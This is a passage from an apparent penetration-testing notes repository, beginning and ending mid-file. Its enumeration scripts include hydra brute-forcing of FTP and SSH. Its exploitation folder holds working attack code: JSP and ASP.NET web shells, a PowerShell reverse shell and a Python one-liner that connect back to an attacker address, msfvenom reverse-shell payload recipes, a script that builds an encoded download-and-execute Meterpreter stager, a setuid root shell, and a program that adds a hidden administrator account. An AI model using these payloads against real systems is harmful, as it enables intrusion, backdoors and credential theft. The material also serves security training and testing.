192.168.1.12 > /tmp/ip.txt 26 | root@kali:~# onesixtyone -c /tmp/community.txt -i /tmp/ip.txt 27 | ``` 28 | 29 | ## Windows SNMP Enumeration Example 30 | 31 | ```ShellSession 32 | root@kali:~# snmpwalk -c puplic -v1 192.168.1.12 33 | ``` 34 | 35 | ## SNMP Enumeration Commands 36 | 37 | ```ShellSession 38 | snmpcheck -t $ip -c public 39 | 40 | snmpwalk -c public -v1 $ip 1| 41 | 42 | grep hrSWRunName|cut -d\* \* -f 43 | 44 | snmpenum -t $ip 45 | 46 | onesixtyone -c names -i hosts 47 | ``` 48 | 49 | ## SNMPv3 Enumeration 50 | 51 | ```ShellSession 52 | nmap -sV -p 161 --script=snmp-info $ip/24 53 | ``` 54 | 55 | ## Automate the username enumeration process for SNMPv3: 56 | 57 | ```ShellSession 58 | apt-get install snmp snmp-mibs-downloader 59 | wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb 60 | ``` 61 | 62 | ## SNMP Default Credentials 63 | 64 | ```ShellSession 65 | /usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.tx 66 | ``` 67 | -------------------------------------------------------------------------------- /enumeration/tools/host_list.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Takes a list of URLs (without trailing slashes) or domains and runs the host command on them, sorting them by IP. 
3 | #strip=$(cat $1|sed 's/https\?:\/\///') 4 | cat $1| while read line; do host "$line"; done |grep -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|sort -n -t " " -k 4 5 | -------------------------------------------------------------------------------- /enumeration/tools/mass.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | strip=$(echo $1|sed 's/https\?:\/\///') 3 | echo "" 4 | echo "##################################################" 5 | host $strip 6 | echo "##################################################" 7 | echo "" 8 | masscan -p1-65535 $(dig +short $strip|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee $strip_scan 9 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/dirbust.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys 4 | import os 5 | import subprocess 6 | 7 | if len(sys.argv) != 3: 8 | print "Usage: dirbust.py " 9 | sys.exit(0) 10 | 11 | url = str(sys.argv[1]) 12 | name = str(sys.argv[2]) 13 | folders = ["/usr/share/dirb/wordlists", "/usr/share/dirb/wordlists/vulns"] 14 | 15 | found = [] 16 | print "INFO: Starting dirb scan for " + url 17 | for folder in folders: 18 | for filename in os.listdir(folder): 19 | 20 | outfile = " -o " + "results/exam/" + name + "_dirb_" + filename 21 | DIRBSCAN = "dirb %s %s/%s %s -S -r" % (url, folder, filename, outfile) 22 | try: 23 | results = subprocess.check_output(DIRBSCAN, shell=True) 24 | resultarr = results.split("\n") 25 | for line in resultarr: 26 | if "+" in line: 27 | if line not in found: 28 | found.append(line) 29 | except: 30 | pass 31 | 32 | try: 33 | if found[0] != "": 34 | print "[*] Dirb found the following items..." 
35 | for item in found: 36 | print " " + item 37 | except: 38 | print "INFO: No items found during dirb scan of " + url 39 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/dnsrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | 5 | if len(sys.argv) != 2: 6 | print "Usage: dnsrecon.py " 7 | sys.exit(0) 8 | 9 | ip_address = sys.argv[1] 10 | HOSTNAME = "nmblookup -A %s | grep '<00>' | grep -v '' | cut -d' ' -f1" % (ip_address)# grab the hostname 11 | host = subprocess.check_output(HOSTNAME, shell=True).strip() 12 | print "INFO: Attempting Domain Transfer on " + host 13 | ZT = "dig @%s.thinc.local thinc.local axfr" % (host) 14 | ztresults = subprocess.check_output(ZT, shell=True) 15 | if "failed" in ztresults: 16 | print "INFO: Zone Transfer failed for " + host 17 | else: 18 | print "[*] Zone Transfer successful for " + host + "(" + ip_address + ")!!! 
[see output file]" 19 | outfile = "results/exam/" + ip_address+ "_zonetransfer.txt" 20 | dnsf = open(outfile, "w") 21 | dnsf.write(ztresults) 22 | dnsf.close 23 | 24 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/ftprecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | import os 5 | 6 | if len(sys.argv) != 3: 7 | print "Usage: ftprecon.py " 8 | sys.exit(0) 9 | 10 | ip_address = sys.argv[1].strip() 11 | port = sys.argv[2].strip() 12 | print "INFO: Performing nmap FTP script scan for " + ip_address + ":" + port 13 | FTPSCAN = "nmap -sV -Pn -vv -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '/root/scripts/recon_enum/results/exam/%s_ftp.nmap' %s" % (port, ip_address, ip_address) 14 | results = subprocess.check_output(FTPSCAN, shell=True) 15 | outfile = "results/exam/" + ip_address + "_ftprecon.txt" 16 | f = open(outfile, "w") 17 | f.write(results) 18 | f.close 19 | 20 | print "INFO: Performing hydra ftp scan against " + ip_address 21 | HYDRA = "hydra -L wordlists/userlist -P wordlists/offsecpass -f -o results/%s_ftphydra.txt -u %s -s %s ftp" % (ip_address, ip_address, port) 22 | results = subprocess.check_output(HYDRA, shell=True) 23 | resultarr = results.split("\n") 24 | for result in resultarr: 25 | if "login:" in result: 26 | print "[*] Valid ftp credentials found: " + result 27 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/readme.txt: -------------------------------------------------------------------------------- 1 | This readme file pertains to the reconscan.py script and all associated scripts. 
2 | 3 | Currently these scripts include: 4 | reconscan.py (main) 5 | dirbust.py 6 | dnsrecon.py 7 | ftprecon.py 8 | reconscan.py 9 | smbrecon.py 10 | smtprecon.py 11 | snmprecon.py 12 | sshrecon.py 13 | 14 | This collection of scripts is intended to be executed remotely against a list of IPs to enumerate discovered 15 | services such as smb, smtp, snmp, ftp and others. 16 | 17 | Author: 18 | Mike Czumak (T_v3rn1x) -- @SecuritySift 19 | 20 | How to use: 21 | reconscan.py is the main script which calls all other scripts. Simply run it and it should do the work for you. 22 | Since I wrote this for a very specific use case, I hard-coded all paths, so be sure you change them accordingly. 23 | You'll also need to check the directories used for writing and modify them accordingly as well. I intentionally kept 24 | these scripts modular so that each script could also be run on its own. 25 | 26 | Warning: 27 | These scripts come as-is with no promise of functionality or accuracy. I strictly wrote them for personal use; 28 | I have no plans to maintain updates, I did not write them to be efficient, and in some cases you may find the 29 | functions may not produce the desired results, so use at your own risk/discretion. I wrote these scripts to 30 | target machines in a lab environment so please only use them against systems for which you have permission!! 31 | 32 | Modification, Distribution, and Attribution: 33 | You are free to modify and/or distribute this script as you wish. 
I only ask that you maintain original 34 | author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's 35 | worth anything anyway :) 36 | 37 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/smbrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import subprocess 4 | 5 | if len(sys.argv) != 2: 6 | print "Usage: smbrecon.py " 7 | sys.exit(0) 8 | 9 | ip = sys.argv[1] 10 | NBTSCAN = "python samrdump.py %s" % (ip) 11 | nbtresults = subprocess.check_output(NBTSCAN, shell=True) 12 | if ("Connection refused" not in nbtresults) and ("Connect error" not in nbtresults) and ("Connection reset" not in nbtresults): 13 | print "[*] SAMRDUMP User accounts/domains found on " + ip 14 | lines = nbtresults.split("\n") 15 | for line in lines: 16 | if ("Found" in line) or (" . " in line): 17 | print " [+] " + line 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/smtprecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | import subprocess 5 | 6 | if len(sys.argv) != 2: 7 | print "Usage: smtprecon.py " 8 | sys.exit(0) 9 | 10 | #SMTPSCAN = "nmap -vv -sV -Pn -p 25,465,587 --script=smtp-vuln* %s" % (sys.argv[1]) 11 | #results = subprocess.check_output(SMTPSCAN, shell=True) 12 | 13 | #f = open("results/smtpnmapresults.txt", "a") 14 | #f.write(results) 15 | #f.close 16 | 17 | 18 | print "INFO: Trying SMTP Enum on " + sys.argv[1] 19 | names = open('/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/namelist.txt', 'r') 20 | for name in names: 21 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | connect=s.connect((sys.argv[1],25)) 23 | banner=s.recv(1024) 24 | s.send('HELO test@test.org \r\n') 25 | result= 
s.recv(1024) 26 | s.send('VRFY ' + name.strip() + '\r\n') 27 | result=s.recv(1024) 28 | if ("not implemented" in result) or ("disallowed" in result): 29 | sys.exit("INFO: VRFY Command not implemented on " + sys.argv[1]) 30 | if (("250" in result) or ("252" in result) and ("Cannot VRFY" not in result)): 31 | print "[*] SMTP VRFY Account found on " + sys.argv[1] + ": " + name.strip() 32 | s.close() 33 | 34 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/snmprecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | 5 | if len(sys.argv) != 2: 6 | print "Usage: snmprecon.py " 7 | sys.exit(0) 8 | 9 | snmpdetect = 0 10 | ip_address = sys.argv[1] 11 | 12 | ONESIXONESCAN = "onesixtyone %s" % (ip_address) 13 | results = subprocess.check_output(ONESIXONESCAN, shell=True).strip() 14 | 15 | if results != "": 16 | if "Windows" in results: 17 | results = results.split("Software: ")[1] 18 | snmpdetect = 1 19 | elif "Linux" in results: 20 | results = results.split("[public] ")[1] 21 | snmpdetect = 1 22 | if snmpdetect == 1: 23 | print "[*] SNMP running on " + ip_address + "; OS Detect: " + results 24 | SNMPWALK = "snmpwalk -c public -v1 %s 1 > results/%s_snmpwalk.txt" % (ip_address, ip_address) 25 | results = subprocess.check_output(SNMPWALK, shell=True) 26 | 27 | NMAPSCAN = "nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes %s" % (ip_address) 28 | results = subprocess.check_output(NMAPSCAN, shell=True) 29 | resultsfile = "results/" + ip_address + "_snmprecon.txt" 30 | f = open(resultsfile, "w") 31 | f.write(results) 32 | f.close 33 | 34 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/sshrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import 
sys 4 | 5 | if len(sys.argv) != 3: 6 | print "Usage: sshrecon.py " 7 | sys.exit(0) 8 | 9 | ip_address = sys.argv[1].strip() 10 | port = sys.argv[2].strip() 11 | 12 | print "INFO: Performing hydra ssh scan against " + ip_address 13 | HYDRA = "hydra -L wordlists/userlist -P wordlists/offsecpass -f -o results/%s_sshhydra.txt -u %s -s %s ssh" % (ip_address, ip_address, port) 14 | try: 15 | results = subprocess.check_output(HYDRA, shell=True) 16 | resultarr = results.split("\n") 17 | for result in resultarr: 18 | if "login:" in result: 19 | print "[*] Valid ssh credentials found: " + result 20 | except: 21 | print "INFO: No valid ssh credentials found" 22 | -------------------------------------------------------------------------------- /enumeration/vulnerability_scanning.md: -------------------------------------------------------------------------------- 1 | # Vulnerability Scanning 2 | 3 | > Vulnerability scans can generate a great deal of traffic and, in some cases, can even result in denial of service conditions on many network devices, so caution must be exercised before making use of mass vulnerability scanners on a penetration test. 4 | 5 | ## Vulnerability Scanning with Nmap 6 | 7 | - To list all available Nmap vulnerability scripts 8 | 9 | ```Shell 10 | cd /usr/share/nmap/scripts/ 11 | ls -l *vuln* 12 | ``` 13 | 14 | - Then start using one of them 15 | 16 | We will see in the output that Nmap not only finds whether the server is vulnerable; it also retrieves the admin's password hash. 
17 | 18 | ```Shell 19 | nmap -v -p 80 --script=http-vuln-cve2010-2861 192.168.11.210 20 | ``` 21 | 22 | - The ftp-anon NSE script lets us quickly scan a range of IP addresses for FTP servers that allow anonymous access 23 | 24 | ```Shell 25 | nmap -v -p 21 --script=ftp-anon.nse 192.168.11.200-254 26 | ``` 27 | 28 | - We can check the security level of an SMB server with the smb-security-mode NSE script 29 | 30 | ```Shell 31 | nmap -v -p 139,445 --script=smb-security-mode 192.168.11.236 32 | ``` 33 | 34 | - Beyond penetration testing, network administrators can also benefit from NSE scripts, by verifying that patches have been applied against a group of servers or workstations. 35 | 36 | For example, you can use nmap data to verify that all domain web servers have been patched against CVE-2011-3192, an Apache denial of service vulnerability. 37 | 38 | ```Shell 39 | nmap -v -p 80 --script=http-vuln-cve2011-3192 192.168.11.205-210 40 | ``` 41 | 42 | - In the output above, a server was found to possess the denial of service vulnerability. 43 | - Nmap also provides links to various references that the user can visit for more information about the discovered vulnerability. 44 | 45 | ## The OpenVAS Vulnerability Scanner 46 | 47 | OpenVAS is a powerful vulnerability scanner, containing thousands of vulnerability checks. 48 | 49 | ### OpenVAS Initial Setup 50 | 51 | ```Shell 52 | # First, run the initial setup 53 | > openvas-setup 54 | # Then add user 55 | > openvas-adduser 56 | # now launch Greenbone Security Desktop and log in 57 | > gsd 58 | 59 | ``` 60 | 61 | ## More NSE Scripts 62 | 63 | `nmap -v -p 80 --script http-vuln-cve2010-2861 $IP` 64 | * checks for ColdFusion webservers with a known directory traversal vuln 65 | 66 | `nmap -v -p 80 --script all $IP` 67 | * runs all relevant vuln scripts 68 | 69 | ## OpenVAS 70 | Several steps are needed before running in Kali 71 | 1. `openvas-setup` 72 | 2. 
https://localhost:9392 73 | 74 | * Check out scan config options for optimization 75 | -------------------------------------------------------------------------------- /enumeration/windows_enumeration.md: -------------------------------------------------------------------------------- 1 | net config Workstation 2 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 3 | hostname 4 | net users 5 | ipconfig /all 6 | route print 7 | arp -A 8 | netstat -ano 9 | netsh firewall show state 10 | netsh firewall show config 11 | schtasks /query /fo LIST /v 12 | tasklist /SVC 13 | net start 14 | DRIVERQUERY 15 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 16 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 17 | dir /s *pass* == *cred* == *vnc* == *.config* 18 | findstr /si password *.xml *.ini *.txt 19 | reg query HKLM /f password /t REG_SZ /s 20 | reg query HKCU /f password /t REG_SZ /s 21 | -------------------------------------------------------------------------------- /exploitation/643-fixed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/exploitation/643-fixed -------------------------------------------------------------------------------- /exploitation/Post-Exploitation.md: -------------------------------------------------------------------------------- 1 | # Post Exploitation 2 | 3 | ## File Transfers 4 | 5 | * can be difficult on a freshly compromised machine 6 | 7 | ### TFTP File Transfers 8 | -------------------------------------------------------------------------------- /exploitation/Public Exploits.md: -------------------------------------------------------------------------------- 1 | # Using Public Exploits 2 | 3 | * Be careful running public exploits 4 | 5 | ## Finding Exploits 6 | 7 | [SecurityFocus](http://www.securityfocus.com/vulnerabilities) 8 | 9 | 
### Exploit Database 10 | 11 | [Exploit Database](https://www.exploit-db.com/) 12 | 13 | Kali contains a script to check this offline: 14 | 15 | `searchsploit slmail` 16 | 17 | ## Fixing Exploits #1 18 | 19 | 643.c 20 | 21 | 22 | ## Cross Compiling Windows executable code 23 | 24 | * use mingw32 25 | 26 | `i586-mingw32msvc-gcc 646-fixed.c -lws2_32 -o slmail-windows.exe` 27 | -------------------------------------------------------------------------------- /exploitation/computer_network_exploits.md: -------------------------------------------------------------------------------- 1 | # Computer and Network Hacker Exploits 2 | 3 | ## General Trends 4 | 5 | ### How to make money on malicious code 6 | 7 | - Sell the code for backdoors/bots 8 | - Spam and web-based advertising 9 | - Pump and dump stock schemes 10 | - Phishing: e-mail, phone, and targeted (spear) phishing 11 | - Denial of Service extortion 12 | - Keystroke loggers stealing financial information 13 | - Rent out armies of infected systems for all of the above 14 | - RAM scrapers pulling CC numbers off POS terminals 15 | 16 | ### Software Distro-Site Attacks 17 | 18 | - Hack into web and FTP sites and alter software to include a backdoor ==> Everyone who downloads and uses the tool is impacted 19 | 20 | - Another approach is embodied in the ISR-Evilgrade tool 21 | - Listens for software to request an update 22 | - Sends a response with malware 23 | - Currently includes modules for Java browser plug-ins, Winzip, WinAmp, MacOS X, OpenOffice, iTunes, LinkedIn toolbar, and more. More than 60 software packages in total whose Internet updates can be subverted this way 24 | 25 | ### Software Distro-Site Defenses 26 | 27 | - Check hashes across multiple mirrors 28 | - Check both MD5 and SHA-1 at least (both are collision-broken; prefer SHA-256 and a signature whenever the publisher offers them) 29 | - Md5sum and sha1sum are built into Linux 30 | - Md5summer is available for free for Windows (md5summer.org) 31 | - Md5deep is another good project at http://md5deep.sourceforge.net/ 32 | - Calculates MD5, SHA-1, SHA-256, Tiger, 
and Whirlpool hashes 33 | - Available for Win and Linux/UNIX 34 | - RIPEMD-160 35 | - Check PGP signatures if available 36 | - Make sure you check against a trustworthy key 37 | - Don't put new software directly into production; test first 38 | 39 | --- 40 | 41 | ## Reconnaissance 42 | 43 | 44 | 45 | ### DNS and nslookup 46 | 47 | - The Domain Name System is full of useful information about a target 48 | - The attacker's goal is to discover as many IP addresses associated with the target domain as possible 49 | - The nslookup command can be used to interact with a DNS server to get this data 50 | -------------------------------------------------------------------------------- /exploitation/downloadproxy.ps1: -------------------------------------------------------------------------------- 1 | $browser=New-Object System.Net.WebClient; $browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX($browser.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1"));Invoke-ShareFinder 2 | -------------------------------------------------------------------------------- /exploitation/ftp-txt: -------------------------------------------------------------------------------- 1 | Usage: ftp -v -n -s:ftp.txt 2 | 3 | echo open [---attacker IP---]> ftp.txt 4 | echo [---ftp username---]>> ftp.txt 5 | echo [---ftp password---]>> ftp.txt 6 | echo bin>> ftp.txt 7 | echo GET [---filename---]>> ftp.txt 8 | echo bye>> ftp.txt 9 | -------------------------------------------------------------------------------- /exploitation/jsp_processbuilder_shell.java: -------------------------------------------------------------------------------- 1 |
 2 | <%@ page import="java.util.*,java.io.*,java.lang.*"%>
<%-- NOTE(review): unauthenticated JSP web shell. The "cmd" request parameter is
     split on whitespace and executed through ProcessBuilder; the child's stdout
     is copied line by line into the HTTP response. From a defender's side, any
     JSP under a deployed webroot that passes request input into
     ProcessBuilder/Runtime.exec is a high-confidence indicator of compromise:
     file-integrity monitoring of the deploy directory, and alerting on the
     servlet container's JVM spawning child processes, are the practical
     detections. --%>
 3 | <%
 4 | String cmd = request.getParameter("cmd");
 5 | Process a =( new java.lang.ProcessBuilder(cmd.toString().split("\\s"))).start();
 6 | InputStream in = a.getInputStream();
 7 | DataInputStream dis = new DataInputStream(in);
 8 | String disr = dis.readLine();
 9 | while ( disr != null ) {
10 | out.println(disr);
11 | disr = dis.readLine();
12 | }
13 | %>
14 | 
15 | -------------------------------------------------------------------------------- /exploitation/jspb64_shell.java: -------------------------------------------------------------------------------- 1 |
 2 | <%@ page import="java.util.*,java.io.*,java.lang.*"%>
<%-- NOTE(review): same web shell as jsp_processbuilder_shell.java, except the
     "cmd" parameter is base64-decoded (via the non-public sun.misc.BASE64Decoder)
     before being split and executed. The encoding means request logs will not
     show the command text, so log-based keyword matching is unreliable here;
     rely on integrity monitoring of the webroot and on process-lineage alerts
     (child processes of the servlet container's JVM) instead. --%>
 3 | <%
 4 | sun.misc.BASE64Decoder dec64 = new sun.misc.BASE64Decoder();
 5 | byte[] bc = dec64.decodeBuffer(request.getParameter("cmd"));
 6 | String sc = new String(bc, "UTF-8");
 7 | Process a =( new java.lang.ProcessBuilder(sc.toString().split("\\s"))).start();
 8 | InputStream in = a.getInputStream();
 9 | DataInputStream dis = new DataInputStream(in);
10 | String disr = dis.readLine();
11 | while ( disr != null ) {
12 | out.println(disr);
13 | disr = dis.readLine();
14 | }
15 | %>
16 | 
17 | -------------------------------------------------------------------------------- /exploitation/minimum_csharp_shell.java: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import Namespace="System.Diagnostics" %> 3 | <%= 4 | Process.Start( 5 | new ProcessStartInfo("cmd" ,"/c " + Request["c"] ) 6 | { 7 | UseShellExecute = false, 8 | RedirectStandardOutput = true 9 | } 10 | ).StandardOutput.ReadToEnd() 11 | %> 12 | -------------------------------------------------------------------------------- /exploitation/nc_transfers.txt: -------------------------------------------------------------------------------- 1 | Push from Client to Listener 2 | On target machine: nc -lp [local port] > [outfile] 3 | On attacker machine: nc -w3 [listener IP] [listener port] < [infile] 4 | Send [infile] to listener, where it will be stored in [outfile] 5 | 6 | Pull from Listener to Client 7 | On target machine: nc -lp [local port] < [infile] 8 | On attacker machine: nc -w3 [listener IP] [listener port] > [outfile] 9 | Get [infile] from listener and store in [outfile] 10 | -------------------------------------------------------------------------------- /exploitation/powershell_to_meterpreter.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # meterpreter ip & port 4 | lhost=10.10.14.xx 5 | lport=443 6 | 7 | echo " * Writing Payload" 8 | cat /usr/share/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload 9 | echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload 10 | 11 | echo " * Prepping Command" 12 | scriptblock="iex (New-Object Net.WebClient).DownloadString('http://$lhost:8000/payload')" 13 | echo $scriptblock 14 | 15 | echo 16 | echo " * Encoding command" 17 | encode="`echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0`" 18 | echo $encode 19 | 20 | command="cmd.exe /c powershell.exe 
-Exec ByPass -Nol -Enc $encode" 21 | echo 22 | echo " * Final command" 23 | echo $command 24 | 25 | echo 26 | echo " * Starting HTTP Server to serve payload" 27 | python -m SimpleHTTPServer 28 | -------------------------------------------------------------------------------- /exploitation/reverse.ps1: -------------------------------------------------------------------------------- 1 | $client = New-Object System.Net.Sockets.TCPClient("192.168.30.165",4444); 2 | $stream = $client.GetStream(); 3 | 4 | $greeting = "PS " + (pwd).Path + "> "; 5 | $sendbyte = ([text.encoding]::ASCII).GetBytes($greeting); 6 | $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush(); 7 | [byte[]]$bytes = 0..255|%{0}; 8 | 9 | 10 | while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { 11 | $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); 12 | $sendback = (iex $data 2>&1 | Out-String ); 13 | $sendback2 = $sendback + "PS " + (pwd).Path + "> "; 14 | $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); 15 | $stream.Write($sendbyte,0,$sendbyte.Length); 16 | $stream.Flush() }; 17 | $client.Close(); 18 | //cat reverse.ps1 | iconv -f UTF8 -t UTF16LE | base64 -w0 19 | //powershell -Enc payload 20 | -------------------------------------------------------------------------------- /exploitation/reverse_shell.py: -------------------------------------------------------------------------------- 1 | # Reverse shell one-liner python 2 | 3 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 4 | -------------------------------------------------------------------------------- /exploitation/reverse_shell_with_msfvenom.md: -------------------------------------------------------------------------------- 1 | ## Reverse Shell with Msfvenom - Cheatsheet 2 | 3 | ### List payloads 4 | 5 | ``` 6 | msfvenom 
-l 7 | ``` 8 | 9 | Or 10 | 11 | ``` 12 | msfvenom --list payloads 13 | ``` 14 | 15 | ### Generate a PHP payload 16 | 17 | ``` 18 | msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php 19 | ``` 20 | 21 | ### Generate a Windows payload 22 | 23 | ##### Meterpreter - Reverse shell (x64): 24 | ``` 25 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > reverse.exe 26 | ``` 27 | 28 | ##### Meterpreter - Reverse shell: 29 | ``` 30 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > reverse.exe 31 | ``` 32 | 33 | ##### Meterpreter - Bind shell: 34 | ``` 35 | msfvenom -p windows/meterpreter/bind_tcp RHOST= LPORT= -f exe > bind.exe 36 | ``` 37 | 38 | ##### CMD - Reverse shell: 39 | 40 | ``` 41 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > prompt.exe 42 | ``` 43 | 44 | ### Generate a Linux payload 45 | 46 | ##### Meterpreter - Reverse shell: 47 | ``` 48 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > reverse_bin 49 | ``` 50 | 51 | ### Generate a Python payload 52 | 53 | ``` 54 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > reverse.py 55 | ``` 56 | 57 | ### Generate a WAR payload 58 | 59 | ``` 60 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > payload.war 61 | ``` 62 | 63 | ### Generate an ASP payload 64 | 65 | ``` 66 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > reverse.asp 67 | ``` 68 | 69 | ### Generate encoded payloads 70 | 71 | ##### Shikata\_ga\_nai 72 | ``` 73 | msfvenom -p -e shikata_ga_nai -i 5 -f raw > reverse 74 | ``` 75 | -------------------------------------------------------------------------------- /exploitation/setuid.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | int main() 6 | { 7 | setuid(0); 8 | setgid(0); 9 | system( "/bin/sh -i" ); 10 | } 11 | 
-------------------------------------------------------------------------------- /exploitation/useradd.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main() 3 | { 4 | int i; 5 | int j; 6 | i = system("net user [---username---] [---password---] /add"); 7 | j = system("net localgroup administrators [---username---] /add"); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /exploitation/wget-ps1: -------------------------------------------------------------------------------- 1 | Usage: echo "" | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 2 | 3 | Make sure to change the values for $url and $file before sending the commands 4 | 5 | echo $storageDir = $pwd > wget.ps1 6 | echo $webclient = New-Object System.Net.WebClient >> wget.ps1 7 | echo $url = "[---URL (with filepath)---]" >> wget.ps1 8 | echo $file = "[---saved file name---]" >> wget.ps1 9 | echo $webclient.DownloadFile($url,$file) >> wget.ps1 10 | -------------------------------------------------------------------------------- /exploitation/wget-vbs: -------------------------------------------------------------------------------- 1 | Usage: cscript wget.vbs http://[URL (including file)] [filename to save to] 2 | 3 | On attacker machine: 4 | copy file to transfer to: **/var/www** 5 | start apache: **service apache2 start** 6 | 7 | 8 | 9 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 10 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 11 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 12 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 13 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 14 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 15 | echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 16 | echo Err.Clear >> wget.vbs 17 | echo Set http = Nothing >> wget.vbs 18 
| echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 19 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 20 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 21 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 22 | echo http.Open "GET", strURL, False >> wget.vbs 23 | echo http.Send >> wget.vbs 24 | echo varByteArray = http.ResponseBody >> wget.vbs 25 | echo set http = Nothing >> wget.vbs 26 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 27 | echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 28 | echo strData = "" >> wget.vbs 29 | echo strBuffer = "" >> wget.vbs 30 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 31 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 32 | echo Next >> wget.vbs 33 | echo ts.Close >> wget.vbs 34 | -------------------------------------------------------------------------------- /exploitation/wget.vbs: -------------------------------------------------------------------------------- 1 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 2 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 3 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 4 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 5 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 6 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 7 | echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 8 | echo Err.Clear >> wget.vbs 9 | echo Set http = Nothing >> wget.vbs 10 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 11 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 12 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 13 | echo If http Is Nothing Then Set http = 
